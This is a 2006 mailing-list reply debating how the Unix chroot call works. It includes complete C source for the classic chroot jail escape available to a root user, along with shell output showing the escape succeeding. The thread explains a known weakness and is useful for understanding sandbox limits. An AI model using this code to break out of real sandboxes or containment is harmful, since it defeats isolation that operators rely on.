On Saturday September 23 2006 03:31, Amos Shapira wrote:
> On 23/09/06, Michael Vasiliev <[EMAIL PROTECTED]> wrote:
> > Not entirely correct, if you have some privileges, namely if you are
> > still a root user inside a chroot padded cell, you can easily break out
> > by moving up
>
> a root user can just create a device file and access any device
> through that, that's why you shouldn't give root access if you don't
> trust the user of the chroot jail.

No points. We weren't discussing that, we discussed how the chroot call works. 
There are an infinite number of things you can do with root access.

> > the tree with fchdir(open(".",O_RDONLY)), followed by a number of
> > chdir("..") and chrooting("."), eventually hitting the /. I think the BSD
> > version of
>
> Are you sure?  Have you tried this?

Actually, I did something like that, about ten years ago. :) But don't tell 
anyone, ok? ;)

> Here is what happens at the root of a chroot'ed directory:
> # ls -ldi . ..
> 2 drwxr-xr-x  22 root root 624 2006-06-08 17:49 .
> 2 drwxr-xr-x  22 root root 624 2006-06-08 17:49 ..
>
> Same directory outside chroot:
> # ls -ldi . ..
> 2 drwxr-xr-x 22 root root  624 2006-06-08 17:49 .
> 2 drwxr-xr-x 22 root root 4096 2006-08-26 10:25 ..
>
> I.e. the chroot environment will simulate the standard practice of
> "/.." == "/" (the "624" means that they are the same i-node)

Ok, they are on the same inode. I never claimed otherwise. And your point is?

If the chroot does not set the working directory of the calling program to the 
chroot one, I don't even need the fchroot call.

#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

int main(void)
{
    int i;

    /* Create a subdirectory and chroot into it; the cwd stays outside. */
    mkdir("foo", 0755);
    chroot("foo");

    /* Walk upward from the still-unconfined cwd until we hit the real /. */
    for (i = 0; i < 255; i++) {
        chdir("..");
    }

    /* Re-root at the real / and hand over to a shell. */
    chroot(".");
    execl("/bin/sh", "-i", (char *)NULL);
    return 1;
}

Works for me...

foo / # chroot /chroot /bin/bash
bash-3.1# ./bar
foo / # ls
bin  boot  chroot  dev  etc  home  lib  lost+found  mnt  opt  proc  root  sbin  
sys  tmp  usr  var
foo / #

Anyway, that example is sort of a classic spherical horse in vacuum, because I 
have a shell(sic!) inside my jail.

-- 
Sincerely Yours,
Michael Vasiliev

.. Any resemblance between the above views and those of my employer, my 
terminal, or the view out my window are purely coincidental.  Any resemblance 
between the above and my own views is non-deterministic.  The question of the 
existence of views in the absence of anyone to hold them is left as an 
exercise for the reader.  The question of the existence of the reader is left 
as an exercise for the second god coefficient.  (A discussion of 
non-orthogonal, non-integral polytheism is beyond the scope of this article.)
